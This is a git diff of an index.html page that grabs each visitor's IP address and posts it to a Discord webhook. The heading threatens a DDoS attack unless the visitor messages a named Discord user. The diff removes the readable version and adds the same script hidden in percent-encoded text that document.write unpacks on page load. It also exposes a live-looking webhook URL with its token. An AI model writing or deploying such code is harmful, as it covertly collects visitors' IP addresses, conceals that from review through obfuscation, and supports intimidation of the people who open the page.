--- a/index.html
+++ b/index.html
@@ -1,97 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>TOMMY PARKY BIG STRONG</title>
-    <style>
-        /* Add background image */
-        body {
-            background-image: url('https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Ftse1.mm.bing.net%2Fth%3Fid%3DOIP.2noV3-lGoW1Q1GrwWPYN3wHaEK%26pid%3DApi&f=1&ipt=9c0b0b1e1a44aec7cf8d02d023edc5304cecea26a49938b665e995a728d0f1aa');  /* Replace with your image URL */
-            background-size: cover;
-            background-position: center;
-            background-attachment: fixed;
-            color: white;
-            font-family: Arial, sans-serif;
-            margin: 0;
-            padding: 0;
-            height: 100vh;
-        }
-
-        /* Style for the h1 element */
-        h1 {
-            text-align: center;
-            margin-top: 50px;
-            font-size: 2em;
-            animation: colorChange 3s infinite alternate;  /* Apply color change animation */
-        }
-
-        /* Style for the status text */
-        #status {
-            text-align: center;
-            font-size: 1.5em;
-            margin-top: 20px;
-            animation: colorChange 5s infinite alternate;  /* Apply color change animation */
-        }
-
-        /* CSS Keyframes for changing text color */
-        @keyframes colorChange {
-            0% { color: #ff6347; }  /* Tomato */
-            25% { color: #32cd32; } /* LimeGreen */
-            50% { color: #1e90ff; } /* DodgerBlue */
-            75% { color: #ff1493; } /* DeepPink */
-            100% { color: #ffd700; } /* Gold */
-        }
-    </style>
-</head>
-<body>
-    <h1>Fetching and Sending Your IP Address to UTUBETROLLPOLICE
-    
-    Message "nisgib" on discord or get u will be ddosed by us ! </h1>
-    <p id="status">Loading...</p>
-
-    <script>
-        // Define the Discord Webhook URL
-        const discordWebhookUrl = 'https://ptb.discord.com/api/webhooks/1376131891102748682/V5XxcrZyBUX9_ybZQf92kt8k6IceJJt87k-i6EUatSMLE8Krq1Oqz218_o6URnKbBzeZ';  // Replace with your Discord webhook URL
-
-        // Fetch the user's IP address from ipify
-        fetch('https://api.ipify.org?format=json')
-            .then(response => response.json())  // Parse JSON response
-            .then(data => {
-                // Get the user's IP address
-                const userIp = data.ip;
-
-                // Display IP on the webpage
-                document.getElementById('status').textContent = `Your IP Address: ${userIp}`;
-
-                // Create the message payload for Discord
-                const payload = {
-                    content: `New user IP: ${userIp}`  // The message you want to send to Discord
-                };
-
-                // Send the IP to the Discord webhook
-                fetch(discordWebhookUrl, {
-                    method: 'POST',
-                    headers: {
-                        'Content-Type': 'application/json',
-                    },
-                    body: JSON.stringify(payload)  // Send the payload as JSON
-                })
-                .then(response => {
-                    if (response.ok) {
-                        console.log('IP address sent to Discord successfully');
-                    } else {
-                        console.error('Failed to send IP to Discord');
-                    }
-                })
-                .catch(error => {
-                    console.error('Error sending IP to Discord:', error);
-                });
-            })
-            .catch(error => {
-                console.error('Error fetching IP address:', error);
-                document.getElementById('status').textContent = 'Unable to fetch IP address';
-            });
-    </script>
-</body>
-</html>
+<script language="javascript">document.write(unescape('%3C%21%44%4F%43%54%59%50%45%20%68%74%6D%6C%3E%0A%3C%68%74%6D%6C%20%6C%61%6E%67%3D%22%65%6E%22%3E%0A%3C%68%65%61%64%3E%0A%20%20%20%20%3C%6D%65%74%61%20%63%68%61%72%73%65%74%3D%22%55%54%46%2D%38%22%3E%0A%20%20%20%20%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%76%69%65%77%70%6F%72%74%22%20%63%6F%6E%74%65%6E%74%3D%22%77%69%64%74%68%3D%64%65%76%69%63%65%2D%77%69%64%74%68%2C%20%69%6E%69%74%69%61%6C%2D%73%63%61%6C%65%3D%31%2E%30%22%3E%0A%20%20%20%20%3C%74%69%74%6C%65%3E%54%4F%4D%4D%59%20%50%41%52%4B%59%20%42%49%47%20%53%54%52%4F%4E%47%3C%2F%74%69%74%6C%65%3E%0A%20%20%20%20%3C%73%74%79%6C%65%3E%0A%20%20%20%20%20%20%20%20%2F%2A%20%41%64%64%20%62%61%63%6B%67%72%6F%75%6E%64%20%69%6D%61%67%65%20%2A%2F%0A%20%20%20%20%20%20%20%20%62%6F%64%79%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%69%6D%61%67%65%3A%20%75%72%6C%28%27%68%74%74%70%73%3A%2F%2F%65%78%74%65%72%6E%61%6C%2D%63%6F%6E%74%65%6E%74%2E%64%75%63%6B%64%75%63%6B%67%6F%2E%63%6F%6D%2F%69%75%2F%3F%75%3D%68%74%74%70%73%25%33%41%25%32%46%25%32%46%74%73%65%31%2E%6D%6D%2E%62%69%6E%67%2E%6E%65%74%25%32%46%74%68%25%33%46%69%64%25%33%44%4F%49%50%2E%32%6E%6F%56%33%2D%6C%47%6F%57%31%51%31%47%72%77%57%50%59%4E%33%77%48%61%45%4B%25%32%36%70%69%64%25%33%44%41%70%69%26%66%3D%31%26%69%70%74%3D%39%63%30%62%30%62%31%65%31%61%34%34%61%65%63%37%63%66%38%64%30%32%64%30%32%33%65%64%63%35%33%30%34%63%65%63%65%61%32%36%61%34%39%39%33%38%62%36%36%35%65%39%39%35%61%37%32%38%64%30%66%31%61%61%27%29%3B%20%20%2F%2A%20%52%65%70%6C%61%63%65%20%77%69%74%68%20%79%6F%75%72%20%69%6D%61%67%65%20%55%52%4C%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%73%69%7A%65%3A%20%63%6F%76%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%70%6F%73%69%74%69%6F%6E%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%62%61%63%6B%67%72%6F%75%6E%64%2D%61%74%74%61%63%68%6D%65%6E%74%3A%20%66%69%78%65%64%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6C%6F%72%3A%20%77%68%69%74%65%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%41%72%69%61%6C%2C%20%73%61%6E%73%2D%73%65%72%69%66%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%72%67%69%6E%3A%20%30%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%70%61%64%64%69%6E%67%3A%20%30%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%68%65%69%67%68%74%3A%20%31%30%30%76%68%3B%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%2F%2A%20%53%74%79%6C%65%20%66%6F%72%20%74%68%65%20%68%31%20%65%6C%65%6D%65%6E%74%20%2A%2F%0A%20%20%20%20%20%20%20%20%68%31%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%72%67%69%6E%2D%74%6F%70%3A%20%35%30%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%32%65%6D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%61%6E%69%6D%61%74%69%6F%6E%3A%20%63%6F%6C%6F%72%43%68%61%6E%67%65%20%33%73%20%69%6E%66%69%6E%69%74%65%20%61%6C%74%65%72%6E%61%74%65%3B%20%20%2F%2A%20%41%70%70%6C%79%20%63%6F%6C%6F%72%20%63%68%61%6E%67%65%20%61%6E%69%6D%61%74%69%6F%6E%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%2F%2A%20%53%74%79%6C%65%20%66%6F%72%20%74%68%65%20%73%74%61%74%75%73%20%74%65%78%74%20%2A%2F%0A%20%20%20%20%20%20%20%20%23%73%74%61%74%75%73%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%74%65%78%74%2D%61%6C%69%67%6E%3A%20%63%65%6E%74%65%72%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%2E%35%65%6D%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%6D%61%72%67%69%6E%2D%74%6F%70%3A%20%32%30%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%61%6E%69%6D%61%74%69%6F%6E%3A%20%63%6F%6C%6F%72%43%68%61%6E%67%65%20%35%73%20%69%6E%66%69%6E%69%74%65%20%61%6C%74%65%72%6E%61%74%65%3B%20%20%2F%2A%20%41%70%70%6C%79%20%63%6F%6C%6F%72%20%63%68%61%6E%67%65%20%61%6E%69%6D%61%74%69%6F%6E%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20%2F%2A%20%43%53%53%20%4B%65%79%66%72%61%6D%65%73%20%66%6F%72%20%63%68%61%6E%67%69%6E%67%20%74%65%78%74%20%63%6F%6C%6F%72%20%2A%2F%0A%20%20%20%20%20%20%20%20%40%6B%65%79%66%72%61%6D%65%73%20%63%6F%6C%6F%72%43%68%61%6E%67%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%30%25%20%7B%20%63%6F%6C%6F%72%3A%20%23%66%66%36%33%34%37%3B%20%7D%20%20%2F%2A%20%54%6F%6D%61%74%6F%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%32%35%25%20%7B%20%63%6F%6C%6F%72%3A%20%23%33%32%63%64%33%32%3B%20%7D%20%2F%2A%20%4C%69%6D%65%47%72%65%65%6E%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%35%30%25%20%7B%20%63%6F%6C%6F%72%3A%20%23%31%65%39%30%66%66%3B%20%7D%20%2F%2A%20%44%6F%64%67%65%72%42%6C%75%65%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%37%35%25%20%7B%20%63%6F%6C%6F%72%3A%20%23%66%66%31%34%39%33%3B%20%7D%20%2F%2A%20%44%65%65%70%50%69%6E%6B%20%2A%2F%0A%20%20%20%20%20%20%20%20%20%20%20%20%31%30%30%25%20%7B%20%63%6F%6C%6F%72%3A%20%23%66%66%64%37%30%30%3B%20%7D%20%2F%2A%20%47%6F%6C%64%20%2A%2F%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%3C%2F%73%74%79%6C%65%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%20%20%20%20%3C%68%31%3E%46%65%74%63%68%69%6E%67%20%61%6E%64%20%53%65%6E%64%69%6E%67%20%59%6F%75%72%20%49%50%20%41%64%64%72%65%73%73%20%74%6F%20%55%54%55%42%45%54%52%4F%4C%4C%50%4F%4C%49%43%45%0A%20%20%20%20%0A%20%20%20%20%4D%65%73%73%61%67%65%20%22%6E%69%73%67%69%62%22%20%6F%6E%20%64%69%73%63%6F%72%64%20%6F%72%20%67%65%74%20%75%20%77%69%6C%6C%20%62%65%20%64%64%6F%73%65%64%20%62%79%20%75%73%20%21%20%3C%2F%68%31%3E%0A%20%20%20%20%3C%70%20%69%64%3D%22%73%74%61%74%75%73%22%3E%4C%6F%61%64%69%6E%67%2E%2E%2E%3C%2F%70%3E%0A%0A%20%20%20%20%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%20%20%20%20%2F%2F%20%44%65%66%69%6E%65%20%74%68%65%20%44%69%73%63%6F%72%64%20%57%65%62%68%6F%6F%6B%20%55%52%4C%0A%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%64%69%73%63%6F%72%64%57%65%62%68%6F%6F%6B%55%72%6C%20%3D%20%27%68%74%74%70%73%3A%2F%2F%70%74%62%2E%64%69%73%63%6F%72%64%2E%63%6F%6D%2F%61%70%69%2F%77%65%62%68%6F%6F%6B%73%2F%31%33%37%36%31%33%31%38%39%31%31%30%32%37%34%38%36%38%32%2F%56%35%58%78%63%72%5A%79%42%55%58%39%5F%79%62%5A%51%66%39%32%6B%74%38%6B%36%49%63%65%4A%4A%74%38%37%6B%2D%69%36%45%55%61%74%53%4D%4C%45%38%4B%72%71%31%4F%71%7A%32%31%38%5F%6F%36%55%52%6E%4B%62%42%7A%65%5A%27%3B%20%20%2F%2F%20%52%65%70%6C%61%63%65%20%77%69%74%68%20%79%6F%75%72%20%44%69%73%63%6F%72%64%20%77%65%62%68%6F%6F%6B%20%55%52%4C%0A%0A%20%20%20%20%20%20%20%20%2F%2F%20%46%65%74%63%68%20%74%68%65%20%75%73%65%72%27%73%20%49%50%20%61%64%64%72%65%73%73%20%66%72%6F%6D%20%69%70%69%66%79%0A%20%20%20%20%20%20%20%20%66%65%74%63%68%28%27%68%74%74%70%73%3A%2F%2F%61%70%69%2E%69%70%69%66%79%2E%6F%72%67%3F%66%6F%72%6D%61%74%3D%6A%73%6F%6E%27%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%74%68%65%6E%28%72%65%73%70%6F%6E%73%65%20%3D%3E%20%72%65%73%70%6F%6E%73%65%2E%6A%73%6F%6E%28%29%29%20%20%2F%2F%20%50%61%72%73%65%20%4A%53%4F%4E%20%72%65%73%70%6F%6E%73%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%74%68%65%6E%28%64%61%74%61%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%47%65%74%20%74%68%65%20%75%73%65%72%27%73%20%49%50%20%61%64%64%72%65%73%73%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%75%73%65%72%49%70%20%3D%20%64%61%74%61%2E%69%70%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%44%69%73%70%6C%61%79%20%49%50%20%6F%6E%20%74%68%65%20%77%65%62%70%61%67%65%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%73%74%61%74%75%73%27%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%60%59%6F%75%72%20%49%50%20%41%64%64%72%65%73%73%3A%20%24%7B%75%73%65%72%49%70%7D%60%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%43%72%65%61%74%65%20%74%68%65%20%6D%65%73%73%61%67%65%20%70%61%79%6C%6F%61%64%20%66%6F%72%20%44%69%73%63%6F%72%64%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%74%20%70%61%79%6C%6F%61%64%20%3D%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%74%65%6E%74%3A%20%60%4E%65%77%20%75%73%65%72%20%49%50%3A%20%24%7B%75%73%65%72%49%70%7D%60%20%20%2F%2F%20%54%68%65%20%6D%65%73%73%61%67%65%20%79%6F%75%20%77%61%6E%74%20%74%6F%20%73%65%6E%64%20%74%6F%20%44%69%73%63%6F%72%64%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2F%2F%20%53%65%6E%64%20%74%68%65%20%49%50%20%74%6F%20%74%68%65%20%44%69%73%63%6F%72%64%20%77%65%62%68%6F%6F%6B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%66%65%74%63%68%28%64%69%73%63%6F%72%64%57%65%62%68%6F%6F%6B%55%72%6C%2C%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%6D%65%74%68%6F%64%3A%20%27%50%4F%53%54%27%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%68%65%61%64%65%72%73%3A%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%27%43%6F%6E%74%65%6E%74%2D%54%79%70%65%27%3A%20%27%61%70%70%6C%69%63%61%74%69%6F%6E%2F%6A%73%6F%6E%27%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%62%6F%64%79%3A%20%4A%53%4F%4E%2E%73%74%72%69%6E%67%69%66%79%28%70%61%79%6C%6F%61%64%29%20%20%2F%2F%20%53%65%6E%64%20%74%68%65%20%70%61%79%6C%6F%61%64%20%61%73%20%4A%53%4F%4E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2E%74%68%65%6E%28%72%65%73%70%6F%6E%73%65%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%69%66%20%28%72%65%73%70%6F%6E%73%65%2E%6F%6B%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%6C%6F%67%28%27%49%50%20%61%64%64%72%65%73%73%20%73%65%6E%74%20%74%6F%20%44%69%73%63%6F%72%64%20%73%75%63%63%65%73%73%66%75%6C%6C%79%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%65%72%72%6F%72%28%27%46%61%69%6C%65%64%20%74%6F%20%73%65%6E%64%20%49%50%20%74%6F%20%44%69%73%63%6F%72%64%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2E%63%61%74%63%68%28%65%72%72%6F%72%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%65%72%72%6F%72%28%27%45%72%72%6F%72%20%73%65%6E%64%69%6E%67%20%49%50%20%74%6F%20%44%69%73%63%6F%72%64%3A%27%2C%20%65%72%72%6F%72%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%0A%20%20%20%20%20%20%20%20%20%20%20%20%2E%63%61%74%63%68%28%65%72%72%6F%72%20%3D%3E%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%63%6F%6E%73%6F%6C%65%2E%65%72%72%6F%72%28%27%45%72%72%6F%72%20%66%65%74%63%68%69%6E%67%20%49%50%20%61%64%64%72%65%73%73%3A%27%2C%20%65%72%72%6F%72%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%73%74%61%74%75%73%27%29%2E%74%65%78%74%43%6F%6E%74%65%6E%74%20%3D%20%27%55%6E%61%62%6C%65%20%74%6F%20%66%65%74%63%68%20%49%50%20%61%64%64%72%65%73%73%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E%0A%3C%2F%68%74%6D%6C%3E'))</script>
